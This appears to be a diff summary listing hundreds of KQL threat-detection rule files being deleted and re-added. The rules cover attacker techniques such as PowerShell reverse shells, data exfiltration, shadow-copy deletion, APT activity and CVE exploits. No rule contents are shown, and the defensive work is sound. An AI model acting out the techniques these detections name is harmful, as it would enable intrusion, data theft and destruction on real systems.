...ommand_Execution_Via_Settingcontent-Ms.kql | 7 - ...sembly_DLL_Creation_Via_AspNetCompiler.kql | 8 - Execution/Base64_MZ_Header_In_CommandLine.kql | 7 - ...y_Proxy_Execution_Via_Dotnet-Trace.EXE.kql | 7 - Execution/BloodHound_Collection_Files.kql | 7 - Execution/Blue_Mockingbird_-_Registry.kql | 7 - ...CLR_DLL_Loaded_Via_Office_Applications.kql | 7 - .../CMSTP_Execution_Process_Creation.kql | 7 - Execution/CMSTP_Execution_Registry_Event.kql | 7 - ...CMSTP_UAC_Bypass_via_COM_Object_Access.kql | 7 - Execution/CSExec_Service_File_Creation.kql | 7 - .../Certificate_Exported_Via_PowerShell.kql | 7 - ...werShell_Policies_to_an_Insecure_Level.kql | 7 - ...eadless_Execution_To_Mockbin_Like_Site.kql | 7 - ...ing_Space_Characters_Execution_Anomaly.kql | 9 - ...ith_Suspicious_URL_and_AppData_Strings.kql | 7 - ...omputer_Password_Change_Via_Ksetup.EXE.kql | 7 - ...ter_System_Reconnaissance_Via_Wmic.EXE.kql | 7 - ...Conhost.exe_CommandLine_Path_Traversal.kql | 7 - ...ost_Spawned_By_Uncommon_Parent_Process.kql | 7 - Execution/Control_Panel_Items.kql | 7 - ...ureString_Cmdlet_Usage_Via_CommandLine.kql | 7 - ...Created_Files_by_Microsoft_Sync_Center.kql | 7 - ...ion_Form_Potentially_Suspicious_Parent.kql | 7 - ...quest_With_Potential_Custom_User-Agent.kql | 7 - Execution/DLL_Load_via_LSASS.kql | 7 - ..._of_PowerShell_Execution_via_Sqlps.exe.kql | 9 - ...ork_Connection_To_Non-Local_IP_Address.kql | 10 - ...mbly_DLL_Loaded_Via_Office_Application.kql | 7 - ...R_DLL_Loaded_By_Scripting_Applications.kql | 7 - ...Enable_Microsoft_Dynamic_Data_Exchange.kql | 7 - .../Exchange_PowerShell_Snap-Ins_Usage.kql | 7 - Execution/Execute_Code_with_Pester.bat.kql | 7 - ...Execute_Code_with_Pester.bat_as_Parent.kql | 7 - Execution/Execute_MSDT_Via_Answer_File.kql | 7 - ...Execute_Pcwrun.EXE_To_Leverage_Follina.kql | 7 - ..._of_Powershell_Script_in_Public_Folder.kql | 7 - Execution/File_Decryption_Using_Gpg4win.kql | 7 - ...nload_From_IP_Based_URL_Via_CertOC.EXE.kql | 7 - ...File_Download_From_IP_URL_Via_Curl.EXE.kql | 7 - Execution/File_Encryption_Using_Gpg4win.kql | 7 - ...nsion_Created_By_An_Office_Application.kql | 7 - Execution/Forfiles_Command_Execution.kql | 10 - .../Fsutil_Behavior_Set_SymlinkEvaluation.kql | 9 - ...GAC_DLL_Loaded_Via_Office_Applications.kql | 7 - ...L_Help_HH.EXE_Suspicious_Child_Process.kql | 7 - ...ackTool_-_Covenant_PowerShell_Launcher.kql | 7 - .../HackTool_-_CrackMapExec_Execution.kql | 7 - ...Tool_-_CrackMapExec_Execution_Patterns.kql | 7 - ..._-_CrackMapExec_PowerShell_Obfuscation.kql | 7 - ..._-_Empire_PowerShell_Launch_Parameters.kql | 7 - .../HackTool_-_Impacket_Tools_Execution.kql | 7 - ..._-_Jlaive_In-Memory_Assembly_Execution.kql | 7 - Execution/HackTool_-_Koadic_Execution.kql | 7 - ...ial_Impacket_Lateral_Movement_Activity.kql | 7 - ...-_RedMimicry_Winnti_Playbook_Execution.kql | 7 - ...l_-_Sliver_C2_Implant_Activity_Pattern.kql | 7 - .../HackTool_-_Stracciatella_Execution.kql | 7 - Execution/HackTool_-_WinPwn_Execution.kql | 8 - ...ware_Model_Reconnaissance_Via_Wmic.EXE.kql | 7 - ...Hidden_Powershell_in_Link_File_Pattern.kql | 7 - ...mputer_Zone_For_HTTP_Protocols_Via_CLI.kql | 8 - ..._Suspicious_Directories_-_ProcCreation.kql | 7 - ...cution_By_Program_Compatibility_Wizard.kql | 7 - Execution/Insecure_Transfer_Via_Curl.EXE.kql | 7 - ..._New_Package_Via_Winget_Local_Manifest.kql | 10 - .../Invoke-Obfuscation_CLIP+_Launcher.kql | 7 - ...nvoke-Obfuscation_COMPRESS_OBFUSCATION.kql | 7 - ...-Obfuscation_Obfuscated_IEX_Invocation.kql | 7 - .../Invoke-Obfuscation_STDIN+_Launcher.kql | 7 - ...Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql | 7 - .../Invoke-Obfuscation_VAR+_Launcher.kql | 7 - Execution/Invoke-Obfuscation_Via_Stdin.kql | 7 - Execution/Invoke-Obfuscation_Via_Use_Clip.kql | 7 - .../Invoke-Obfuscation_Via_Use_MSHTA.kql | 7 - .../Java_Running_with_Remote_Debugging.kql | 7 - Execution/Local_File_Read_Using_Curl.EXE.kql | 7 - ...On_User_Password_Change_Via_Ksetup.EXE.kql | 7 - Execution/MMC20_Lateral_Movement.kql | 7 - Execution/MSHTA_Suspicious_Execution_01.kql | 7 - ...d_PowerShell_Keywords_in_Command_Lines.kql | 7 - ...werShell_Commandlets_-_ProcessCreation.kql | 7 - ...ious_PowerShell_Scripts_-_FileCreation.kql | 7 - ...l_Add-In_Loaded_From_Uncommon_Location.kql | 7 - ..._Center_Suspicious_Network_Connections.kql | 7 - ...A_For_Outlook_Addin_Loaded_Via_Outlook.kql | 7 - .../Microsoft_Workflow_Compiler_Execution.kql | 7 - ...LL_RunHTMLApplication_Suspicious_Usage.kql | 8 - Execution/Net_WebClient_Casing_Anomalies.kql | 7 - ...k_Connection_Initiated_By_Eqnedt32.EXE.kql | 7 - ...k_Connection_Initiated_By_Regsvr32.EXE.kql | 7 - ...k_Connection_Initiated_Via_Notepad.EXE.kql | 10 - Execution/New_Application_in_AppCompat.kql | 7 - .../New_Process_Created_Via_Wmic.EXE.kql | 7 - ...l_Smart_Card_Created_Via_TpmVscMgr.EXE.kql | 7 - ...Interactive_PowerShell_Process_Spawned.kql | 7 - ...ted_Network_Connection_To_Non-Local_IP.kql | 10 - ...erator_Bloopers_Cobalt_Strike_Commands.kql | 7 - ...perator_Bloopers_Cobalt_Strike_Modules.kql | 7 - ...nnection_Initiated_By_Microsoft_Dialer.kql | 10 - ...k_Connection_To_Public_IP_Via_Winlogon.kql | 7 - ...eUnsafeClientMailRules_Setting_Enabled.kql | 7 - Execution/PCRE.NET_Package_Image_Load.kql | 7 - Execution/PCRE.NET_Package_Temp_Files.kql | 7 - ...oy_Remote_Adminstartion_Tool_Execution.kql | 7 - .../PSEXEC_Remote_Execution_File_Artefact.kql | 7 - Execution/PUA_-_AdvancedRun_Execution.kql | 7 - Execution/PUA_-_CsExec_Execution.kql | 7 - Execution/PUA_-_NSudo_Execution.kql | 7 - Execution/PUA_-_NirCmd_Execution.kql | 7 - ...PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql | 7 - .../PUA_-_Radmin_Viewer_Utility_Execution.kql | 7 - Execution/PUA_-_RunXCmd_Execution.kql | 7 - .../PUA_-_Wsudo_Suspicious_Execution.kql | 7 - ...nt_in_Public_Folder_Suspicious_Process.kql | 7 - Execution/Perl_Inline_Command_Execution.kql | 7 - Execution/Php_Inline_Command_Execution.kql | 7 - Execution/Potential_Adplus.EXE_Abuse.kql | 7 - ...rbitrary_Command_Execution_Via_FTP.EXE.kql | 7 - ...Arbitrary_File_Download_Via_Cmdl32.EXE.kql | 10 - ...inary_Impersonating_Sysinternals_Tools.kql | 7 - ...ial_Binary_Proxy_Execution_Via_Cdb.EXE.kql | 7 - ...otential_CobaltStrike_Process_Patterns.kql | 7 - ...trike_Service_Installations_-_Registry.kql | 8 - ...CommandLine_Path_Traversal_Via_Cmd.EXE.kql | 7 - .../Potential_Cookies_Session_Hijacking.kql | 7 - ...nload_Via_PowerShell_Invoke-WebRequest.kql | 7 - ...tration_Activity_Via_CommandLine_Tools.kql | 7 - ...tial_Discovery_Activity_Via_Dnscmd.EXE.kql | 7 - Execution/Potential_Dosfuscation_Activity.kql | 7 - ...ded_PowerShell_Patterns_In_CommandLine.kql | 7 - ...d_Via_MS-AppInstaller_Protocol_Handler.kql | 9 - ...wershell_Search_Order_Hijacking_-_Task.kql | 7 - ...eToolBoxCmd.EXE_VM_State_Change_Script.kql | 7 - ...al_PowerShell_Command_Line_Obfuscation.kql | 7 - .../Potential_PowerShell_Downgrade_Attack.kql | 7 - ...hell_Obfuscation_Via_Reversed_Commands.kql | 7 - ...ntial_PowerShell_Obfuscation_Via_WCHAR.kql | 7 - ...ial_Powershell_ReverseShell_Connection.kql | 7 - ...duct_Class_Reconnaissance_Via_Wmic.EXE.kql | 7 - ...al_Product_Reconnaissance_Via_Wmic.EXE.kql | 7 - ...tential_RDP_Session_Hijacking_Activity.kql | 7 - ...nce_Activity_Via_GatherNetworkInfo.VBS.kql | 7 - ...ger_Content_Execution_Via_WerFault.EXE.kql | 7 - .../Potential_Renamed_Rundll32_Execution.kql | 7 - ...ential_SMB_Relay_Attack_Tool_Execution.kql | 7 - ..._ShellDispatch.DLL_Functionality_Abuse.kql | 7 - ...er_Launch_From_Document_Reader_Process.kql | 8 - ...rvice_Path_Reconnaissance_Via_Wmic.EXE.kql | 7 - ...ial_Ursnif_Malware_Activity_-_Registry.kql | 7 - ...l_Movement_WmiPrvSE_Spawned_PowerShell.kql | 7 - ...Potential_WinAPI_Calls_Via_CommandLine.kql | 7 - ...Child_Process_Of_ClickOnce_Application.kql | 7 - ...lly_Suspicious_Child_Process_Of_VsCode.kql | 7 - ...Suspicious_Child_Process_Of_WinRAR.EXE.kql | 7 - ...ious_Child_Process_of_KeyScrambler.exe.kql | 7 - ...cious_Electron_Application_CommandLine.kql | 7 - ...uspicious_Execution_Of_PDQDeployRunner.kql | 7 - ...File_Sharing_Domain_Via_PowerShell.EXE.kql | 7 - ..._Suspicious_PowerShell_Child_Processes.kql | 7 - ...tially_Suspicious_WebDAV_LNK_Execution.kql | 7 - ...Base64_Encoded_FromBase64String_Cmdlet.kql | 7 - .../PowerShell_Base64_Encoded_IEX_Cmdlet.kql | 7 - ...werShell_Base64_Encoded_Invoke_Keyword.kql | 7 - ...ase64_Encoded_Reflective_Assembly_Load.kql | 7 - .../PowerShell_Base64_Encoded_WMI_Classes.kql | 7 - ...e_DLL_Loaded_By_Non_PowerShell_Process.kql | 9 - Execution/PowerShell_DownloadFile.kql | 7 - Execution/PowerShell_Download_Pattern.kql | 7 - ...erShell_Download_and_Execution_Cradles.kql | 7 - ...With_Potential_Decryption_Capabilities.kql | 7 - ...rShell_Script_Execution_Policy_Enabled.kql | 7 - .../PowerShell_Script_Run_in_AppData.kql | 7 - Execution/PowerShell_Web_Download.kql | 7 - .../PowerShell_as_a_Service_in_Registry.kql | 7 - ...owershell_Inline_Execution_From_A_File.kql | 7 - .../PrinterNightmare_Mimikatz_Driver_Name.kql | 7 - ...ocess_Proxy_Execution_Via_Squirrel.EXE.kql | 8 - .../Process_Reconnaissance_Via_Wmic.EXE.kql | 7 - Execution/Proxy_Execution_Via_Wuauclt.EXE.kql | 7 - ...hild_Process_Execution_as_LOCAL_SYSTEM.kql | 7 - Execution/PsExec_Service_Execution.kql | 7 - Execution/PsExec_Service_File_Creation.kql | 7 - Execution/Psexec_Execution.kql | 7 - Execution/Python_Inline_Command_Execution.kql | 7 - .../Python_Spawning_Pretty_TTY_on_Windows.kql | 7 - Execution/Query_Usage_To_Exfil_Data.kql | 7 - .../Read_Contents_From_Stdin_Via_Cmd.EXE.kql | 7 - ...formance_Counter_Values_Via_Lodctr.EXE.kql | 7 - ..._DLL_Execution_With_Uncommon_Extension.kql | 7 - Execution/RemCom_Service_File_Creation.kql | 7 - ...With_Known_Revoked_Signing_Certificate.kql | 11 - ...ScreenConnect_Remote_Command_Execution.kql | 7 - ...ss_Tool_-_ScreenConnect_Temporary_File.kql | 9 - .../Remote_DLL_Load_Via_Rundll32.EXE.kql | 7 - ...owerShell_Session_Host_Process_(WinRM).kql | 7 - ...Hosted_HTA_File_Executed_Via_Mshta.EXE.kql | 7 - Execution/Renamed_CURL.EXE_Execution.kql | 7 - Execution/Renamed_FTP.EXE_Execution.kql | 7 - Execution/Renamed_Jusched.EXE_Execution.kql | 7 - Execution/Renamed_NirCmd.EXE_Execution.kql | 7 - .../Renamed_PingCastle_Binary_Execution.kql | 7 - .../Renamed_PsExec_Service_Execution.kql | 7 - Execution/Ruby_Inline_Command_Execution.kql | 7 - ...ll_Script_from_Redirected_Input_Stream.kql | 7 - .../Rundll32_Execution_Without_Parameters.kql | 7 - Execution/Rundll32_Internet_Connection.kql | 7 - Execution/Rundll32_UNC_Path_Execution.kql | 7 - ...ent_Tools_PowerShell_Session_Detection.kql | 9 - ...heduled_Task_Creation_Via_Schtasks.EXE.kql | 7 - ...xecuting_Encoded_Payload_from_Registry.kql | 7 - ...d_Task_Executing_Payload_from_Registry.kql | 7 - ...Or_Modification_With_SYSTEM_Privileges.kql | 7 - .../Schtasks_From_Suspicious_Folders.kql | 7 - ...Script_Event_Consumer_Spawning_Process.kql | 7 - ...reter_Execution_From_Suspicious_Folder.kql | 7 - .../Service_Reconnaissance_Via_Wmic.EXE.kql | 11 - ...Type_Change_Via_PowerShell_Set-Service.kql | 7 - .../Service_StartupType_Change_Via_Sc.EXE.kql | 7 - ..._DLL_Execution_in_Suspicious_Directory.kql | 7 - .../Start_Windows_Service_Via_Net.EXE.kql | 7 - ...ectory_Spawned_From_Office_Application.kql | 7 - ...Suspicious_Child_Process_Of_BgInfo.EXE.kql | 7 - ...nd_Patterns_In_Scheduled_Task_Creation.kql | 7 - Execution/Suspicious_Csi.exe_Usage.kql | 7 - ...s_Electron_Application_Child_Processes.kql | 8 - ...Reflection_Assembly_Load_Function_Call.kql | 7 - ...icious_Encoded_PowerShell_Command_Line.kql | 7 - ...cious_Execution_Location_Of_Wermgr.EXE.kql | 7 - ...us_Execution_of_Powershell_with_Base64.kql | 7 - ..._Characteristics_Due_to_Missing_Fields.kql | 7 - .../Suspicious_File_Created_In_PerfLogs.kql | 7 - ...le_Creation_In_Uncommon_AppData_Folder.kql | 7 - ..._From_File_Sharing_Domain_Via_Curl.EXE.kql | 7 - ..._From_File_Sharing_Domain_Via_Wget.EXE.kql | 7 - ...ous_File_Download_From_IP_Via_Curl.EXE.kql | 7 - ...ous_File_Download_From_IP_Via_Wget.EXE.kql | 7 - ..._Download_From_IP_Via_Wget.EXE_-_Paths.kql | 7 - ...tion_From_Internet_Hosted_WebDav_Share.kql | 7 - ...cious_Greedy_Compression_Using_Rar.EXE.kql | 7 - Execution/Suspicious_HH.EXE_Execution.kql | 7 - Execution/Suspicious_HWP_Sub_Processes.kql | 7 - ...cious_Interactive_PowerShell_as_SYSTEM.kql | 7 - .../Suspicious_LOLBIN_AccCheckConsole.kql | 7 - ...picious_Microsoft_Office_Child_Process.kql | 7 - ...icious_Modification_Of_Scheduled_Tasks.kql | 10 - ...uspicious_Mshta.EXE_Execution_Patterns.kql | 7 - .../Suspicious_Outlook_Child_Process.kql | 7 - ...eToolBoxCmd.EXE_VM_State_Change_Script.kql | 7 - ...owerShell_Download_and_Execute_Pattern.kql | 7 - ...us_PowerShell_Encoded_Command_Patterns.kql | 7 - ...ious_PowerShell_IEX_Execution_Patterns.kql | 7 - ...picious_PowerShell_Parameter_Substring.kql | 7 - .../Suspicious_PowerShell_Parent_Process.kql | 7 - ...uspicious_Process_Created_Via_Wmic.EXE.kql | 7 - Execution/Suspicious_Program_Names.kql | 7 - Execution/Suspicious_RASdial_Activity.kql | 7 - ...nce_Activity_Via_GatherNetworkInfo.VBS.kql | 7 - ...ious_Remote_Child_Process_From_Outlook.kql | 7 - Execution/Suspicious_Runscripthelper.exe.kql | 7 - Execution/Suspicious_Scan_Loop_Network.kql | 7 - ...ed_Task_Creation_Involving_Temp_Folder.kql | 7 - ...Suspicious_Scheduled_Task_Name_As_GUID.kql | 7 - ...Scheduled_Task_Write_to_System32_Tasks.kql | 7 - ...ious_Schtasks_Execution_AppData_Folder.kql | 7 - ...uspicious_Schtasks_From_Env_Var_Folder.kql | 7 - ...sks_Schedule_Type_With_High_Privileges.kql | 7 - .../Suspicious_Schtasks_Schedule_Types.kql | 7 - ...ious_Script_Execution_From_Temp_Folder.kql | 7 - ...Suspicious_Spool_Service_Child_Process.kql | 7 - ...ious_Use_of_CSharp_Interactive_Console.kql | 7 - ...ious_WMIC_Execution_Via_Office_Process.kql | 7 - .../Suspicious_WSMAN_Provider_Image_Loads.kql | 7 - ...icious_WindowsTerminal_Child_Processes.kql | 7 - .../Suspicious_WmiPrvSE_Child_Process.kql | 7 - ...picious_XOR_Encoded_PowerShell_Command.kql | 7 - Execution/Suspicious_ZipExec_Execution.kql | 7 - Execution/Sysprep_on_AppData_Folder.kql | 7 - ...And_Volume_Reconnaissance_Via_Wmic.EXE.kql | 10 - Execution/Tasks_Folder_Evasion.kql | 10 - .../UAC_Bypass_Using_IDiagnostic_Profile.kql | 7 - ...ypass_Using_IDiagnostic_Profile_-_File.kql | 7 - .../Uncommon_Child_Process_Of_Appvlp.EXE.kql | 11 - .../Uncommon_Child_Process_Of_BgInfo.EXE.kql | 7 - ...ommon_Child_Process_Of_Defaultpack.EXE.kql | 7 - ...Uncommon_Child_Processes_Of_SndVol.exe.kql | 7 - ..._One_Time_Only_Scheduled_Task_At_00_00.kql | 7 - .../Unusual_Parent_Process_For_Cmd.EXE.kql | 7 - ...ge_Of_Web_Request_Commands_And_Cmdlets.kql | 7 - ...Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql | 7 - Execution/Use_of_FSharp_Interpreters.kql | 9 - Execution/Use_of_OpenConsole.kql | 7 - Execution/Use_of_Pcalua_For_Execution.kql | 7 - Execution/Use_of_Scriptrunner.exe.kql | 7 - .../Using_SettingSyncHost.exe_as_LOLBin.kql | 7 - .../VBA_DLL_Loaded_Via_Office_Application.kql | 7 - .../VMToolsd_Suspicious_Child_Process.kql | 7 - ...PressAnyKey_Arbitrary_Binary_Execution.kql | 7 - ...ejsTools_PressAnyKey_Renamed_Execution.kql | 7 - Execution/WMIC_Remote_Command_Execution.kql | 7 - Execution/WSL_Child_Process_Anomaly.kql | 7 - .../WScript_or_CScript_Dropper_-_File.kql | 7 - ...ab_Execution_From_Non_Default_Location.kql | 7 - Execution/Weak_or_Abused_Passwords_In_CLI.kql | 9 - ...le_File_Creation_By_Non-System_Process.kql | 7 - ...ix_Updates_Reconnaissance_Via_Wmic.EXE.kql | 7 - Execution/WmiPrvSE_Spawned_A_Process.kql | 7 - Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql | 7 - .../Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql | 7 - .../Wscript_Shell_Run_In_CommandLine.kql | 7 - ...Process_Located_In_Suspicious_Location.kql | 8 - ...acting_Cab_Files_From_Suspicious_Paths.kql | 7 - Execution/Wusa_Extracting_Cab_Files.kql | 7 - ...mon_Locations_Via_PresentationHost.EXE.kql | 8 - ...rectory_Structure_Export_Via_Csvde.EXE.kql | 7 - ...ectory_Structure_Export_Via_Ldifde.EXE.kql | 7 - ..._Download_Via_ConfigSecurityPolicy.EXE.kql | 10 - ...n_To_Ngrok_Tunneling_Service_Initiated.kql | 10 - .../Compressed_File_Creation_Via_Tar.EXE.kql | 9 - ...Compressed_File_Extraction_Via_Tar.EXE.kql | 9 - ...rom_Or_To_Admin_Share_Or_Sysvol_Folder.kql | 7 - ...ltration_and_Tunneling_Tools_Execution.kql | 7 - .../Email_Exifiltration_Via_Powershell.kql | 7 - ...ports_Critical_Registry_Keys_To_a_File.kql | 7 - .../Exports_Registry_Key_To_a_File.kql | 7 - ...S_Data_Exfiltration_by_DataSvcUtil.exe.kql | 7 - ...ication_Initiated_To_Portmap.IO_Domain.kql | 7 - ...itiated_To_Cloudflared_Tunnels_Domains.kql | 9 - ...nection_Initiated_To_DevTunnels_Domain.kql | 8 - ...etwork_Connection_Initiated_To_Mega.nz.kql | 9 - ...d_To_Visual_Studio_Code_Tunnels_Domain.kql | 8 - Exfiltration/PUA_-_Rclone_Execution.kql | 7 - ...ed_Network__Connection_To_Ngrok_Domain.kql | 10 - Exfiltration/Rclone_Config_File_Creation.kql | 7 - ...ous_PowerShell_Mailbox_Export_to_Share.kql | 7 - ...cious_Redirection_to_Local_Admin_Share.kql | 7 - ...bDav_Client_Execution_Via_Rundll32.EXE.kql | 8 - Exfiltration/Tap_Installer_Execution.kql | 7 - ...bDav_Client_Execution_Via_Rundll32.EXE.kql | 9 - ...l_Cmdlets_Execution_-_ProccessCreation.kql | 7 - .../All_Backups_Deleted_Via_Wbadmin.EXE.kql | 10 - Impact/Backup_Files_Deleted.kql | 7 - ...onfiguration_Tampering_Via_Bcdedit.EXE.kql | 7 - ...Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql | 7 - Impact/Delete_All_Scheduled_Tasks.kql | 7 - Impact/Delete_Important_Scheduled_Task.kql | 7 - ...eleted_Data_Overwritten_Via_Cipher.EXE.kql | 10 - ..._Shadow_Copies_via_WMI_with_PowerShell.kql | 7 - Impact/Disable_Important_Scheduled_Task.kql | 7 - ...e_Recovery_From_Backup_Via_Wbadmin.EXE.kql | 9 - Impact/Fsutil_Suspicious_Invocation.kql | 9 - ...f_RstrtMgr.DLL_By_A_Suspicious_Process.kql | 10 - ...Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql | 10 - ..._Communication_With_Crypto_Mining_Pool.kql | 7 - ...or_CA_or_AuthRoot_Certificate_to_Store.kql | 7 - Impact/Portable_Gpg.EXE_Execution.kql | 7 - ...eration_Using_AD_Module_-_ProcCreation.kql | 7 - Impact/Potential_Crypto_Mining_Activity.kql | 7 - ...ile_Overwrite_Via_Sysinternals_SDelete.kql | 7 - ...are_Activity_Using_LegalNotice_Message.kql | 7 - ...esktop_Background_Change_Using_Reg.EXE.kql | 9 - ...Desktop_Background_Change_Via_Registry.kql | 9 - Impact/Registry_Disable_System_Restore.kql | 7 - Impact/Renamed_Gpg.EXE_Execution.kql | 7 - ...Renamed_Sysinternals_Sdelete_Execution.kql | 7 - ...e_Access_Via_Volume_Shadow_Copy_Backup.kql | 8 - ...tion_Using_Operating_Systems_Utilities.kql | 7 - Impact/Stop_Windows_Service_Via_Net.EXE.kql | 7 - ...ws_Service_Via_PowerShell_Stop-Service.kql | 7 - Impact/Stop_Windows_Service_Via_Sc.EXE.kql | 7 - ...ious_Creation_TXT_File_in_User_Desktop.kql | 7 - Impact/Suspicious_Execution_of_Shutdown.kql | 7 - ...cious_Execution_of_Shutdown_to_Log_Out.kql | 7 - Impact/Suspicious_Reg_Add_BitLocker.kql | 7 - ...ous_Volume_Shadow_Copy_VSS_PS.dll_Load.kql | 7 - ...ous_Volume_Shadow_Copy_Vssapi.dll_Load.kql | 7 - ...s_Volume_Shadow_Copy_Vsstrace.dll_Load.kql | 7 - ...Windows_Backup_Deleted_Via_Wbadmin.EXE.kql | 10 - ...ommand_Execution_Via_Settingcontent-Ms.kql | 7 - ...L_Help_HH.EXE_Suspicious_Child_Process.kql | 7 - .../ISO_File_Created_Within_Temp_Folders.kql | 7 - ..._Image_Mount_Indicator_in_Recent_Files.kql | 9 - Initial Access/Office_Macro_File_Creation.kql | 7 - ..._File_Creation_From_Suspicious_Process.kql | 7 - Initial Access/Office_Macro_File_Download.kql | 7 - ...rd_Provided_In_Command_Line_Of_Net.EXE.kql | 7 - .../Phishing_Pattern_ISO_in_Archive.kql | 7 - ..._Access_via_DLL_Search_Order_Hijacking.kql | 7 - ...With_Known_Revoked_Signing_Certificate.kql | 11 - ...-_ScreenConnect_Installation_Execution.kql | 7 - ...reenConnect_Server_Web_Shell_Execution.kql | 7 - ...Viewer_Session_Started_On_Windows_Host.kql | 9 - .../Shell_Process_Spawned_by_Java.EXE.kql | 7 - ...Suspicious_Child_Process_Of_SQL_Server.kql | 7 - ...icious_Child_Process_Of_Veeam_Dabatase.kql | 7 - ...icious_Double_Extension_File_Execution.kql | 7 - ...xecution_From_Outlook_Temporary_Folder.kql | 7 - .../Suspicious_File_Drop_by_Exchange.kql | 7 - .../Suspicious_HH.EXE_Execution.kql | 7 - .../Suspicious_HWP_Sub_Processes.kql | 7 - ...SExchangeMailboxReplication_ASPX_Write.kql | 7 - ...icious_Microsoft_OneNote_Child_Process.kql | 7 - ...spicious_Processes_Spawned_by_Java.EXE.kql | 7 - .../Suspicious_Processes_Spawned_by_WinRM.kql | 7 - ...s_Shells_Spawn_by_Java_Utility_Keytool.kql | 7 - .../Terminal_Service_Process_Spawn.kql | 7 - .../Unusual_Child_Process_of_dns.exe.kql | 7 - .../Unusual_File_Deletion_by_Dns.exe.kql | 7 - .../Unusual_File_Modification_by_dns.exe.kql | 7 - ...ows_Registry_Trust_Record_Modification.kql | 7 - .../apt31_judgement_panda_activity.kql | 12 + .../conti_ntds_exfiltration_command.kql | 10 + ...e_database_dumping_activity_via_sqlcmd.kql | 10 + ..._exe_file_creation_by_uncommon_process.kql | 14 ++ .../pandemic_registry_key.kql | 10 + ...cxdesktopapp_beaconing_activity_netcon.kql | 12 + ...eamer_rat_loading_net_executable_image.kql | 11 + ...ulnerability_cve_2025_33053_image_load.kql | 13 + .../potential_pikabot_c2_activity.kql | 14 ++ ...picious_child_process_of_3cxdesktopapp.kql | 10 + .../Credential Access/gallium_iocs.kql | 10 + ..._russian_apt_credential_theft_activity.kql | 12 + ..._file_potential_cve_2025_24054_exploit.kql | 15 ++ ...ishing_campaign_commandline_indicators.kql | 12 + ...2018_phishing_campaign_file_indicators.kql | 12 + .../apt_privatelog_image_load_pattern.kql | 12 + .../blue_mockingbird_registry.kql | 10 + ...d_sleet_apt_dll_sideloading_indicators.kql | 12 + ...t_apt_scheduled_task_creation_registry.kql | 11 + ...ed_by_svr_for_graphicalproton_backdoor.kql | 10 + ...ation_group_dll_u_export_function_load.kql | 12 + ...lden_chickens_deployment_via_ocx_files.kql | 10 + .../exploit_for_cve_2015_1641.kql | 10 + .../flowcloud_registry_markers.kql | 14 ++ ...st_blizzard_apt_file_creation_activity.kql | 14 ++ ...t_javascript_constrained_file_creation.kql | 14 ++ ...blizzard_apt_process_creation_activity.kql | 12 + ...ingle_digit_dll_execution_via_rundll32.kql | 10 + ...ka_backdoor_execution_via_rundll32_exe.kql | 11 + .../lazarus_apt_dll_sideloading_activity.kql | 12 + .../lazarus_system_binary_masquerading.kql | 12 + ..._dll_load_by_compromised_3cxdesktopapp.kql | 12 + .../notpetya_ransomware_activity.kql | 10 + ...l_extension_execution_via_rundll32_exe.kql | 11 + ...ushroom_dll_load_activity_via_regsvr32.kql | 10 + ...al_compromised_3cxdesktopapp_execution.kql | 12 + ...promised_3cxdesktopapp_update_activity.kql | 10 + ...tial_devil_bait_malware_reconnaissance.kql | 12 + ...potential_devil_bait_related_indicator.kql | 12 + .../potential_dridex_activity.kql | 12 + .../potential_emotet_rundll32_execution.kql | 10 + .../potential_empiremonkey_activity.kql | 12 + ...guineapig_goolgeupdate_process_anomaly.kql | 10 + ...al_kapeka_decrypted_backdoor_indicator.kql | 12 + ...ial_ke3chang_tidepool_malware_activity.kql | 10 + .../potential_muddywater_apt_activity.kql | 12 + ...cious_command_combinations_via_cmd_exe.kql | 13 + .../potential_qakbot_rundll32_execution.kql | 12 + ...raspberry_robin_cpl_execution_activity.kql | 12 + .../ps_exe_renamed_sysinternals_tool.kql | 12 + .../qakbot_regsvr32_calc_pattern.kql | 12 + .../qakbot_rundll32_exports_execution.kql | 12 + ..._rundll32_fake_dll_extension_execution.kql | 12 + ...stealer_module_launch_via_rundll32_exe.kql | 10 + ...t_slashandgrab_exploitation_indicators.kql | 11 + ..._sieve_malware_file_indicator_creation.kql | 12 + .../sofacy_trojan_loader_activity.kql | 10 + ...do_privilege_escalation_cve_2019_14287.kql | 12 + ...ous_razerinstaller_explorer_subprocess.kql | 12 + ...ue_of_msdt_in_registry_cve_2022_30190_.kql | 10 + ...mpressed_files_from_temp_sh_using_wget.kql | 10 + ...file_from_untrusted_direct_ip_via_wget.kql | 10 + ...l_certificate_exfiltration_via_openssl.kql | 10 + .../potential_pikabot_discovery_activity.kql | 14 ++ .../Execution/adwind_rat_jrat.kql | 10 + ..._spooler_exploitation_filename_pattern.kql | 10 + .../cve_2021_26858_exchange_exploitation.kql | 13 + ...ve_2021_44077_poc_default_dropped_file.kql | 12 + ...22_24527_microsoft_connected_cache_lpe.kql | 10 + ...icious_confluence_child_process_linux_.kql | 13 + ...ious_confluence_child_process_windows_.kql | 11 + ...tempt_suspicious_double_extension_file.kql | 10 + ...ttempt_suspicious_winrar_child_process.kql | 12 + ...tential_exploitation_rev_file_creation.kql | 12 + ...kgate_autoit3_exe_execution_parameters.kql | 15 ++ ...op_darkgate_loader_in_c_temp_directory.kql | 12 + .../Execution/darkside_ransomware_pattern.kql | 12 + ...ond_sleet_apt_file_creation_indicators.kql | 12 + ..._sleet_apt_process_activity_indicators.kql | 12 + .../droppers_exploiting_cve_2017_11882.kql | 10 + .../Execution/elise_backdoor_activity.kql | 12 + .../emotet_loader_execution_via_lnk_file.kql | 14 ++ .../Execution/exploit_for_cve_2017_0261.kql | 12 + .../Execution/exploit_for_cve_2017_8759.kql | 10 + ...25_59287_wsus_suspicious_child_process.kql | 14 ++ ...e_2020_1472_execution_of_zerologon_poc.kql | 10 + .../fakeupdates_socgholish_activity.kql | 12 + .../file_creation_related_to_rat_clients.kql | 13 + .../Execution/fireball_archer_install.kql | 10 + .../goofy_guineapig_backdoor_ioc.kql | 12 + .../greenbug_espionage_group_indicators.kql | 12 + .../griffon_malware_attack_pattern.kql | 12 + .../hermetic_wiper_tg_process_patterns.kql | 10 + ...ackdoor_curl_tor_socks_proxy_execution.kql | 12 + ...apeka_backdoor_loaded_via_rundll32_exe.kql | 12 + .../Execution/katz_stealer_dll_loaded.kql | 15 ++ 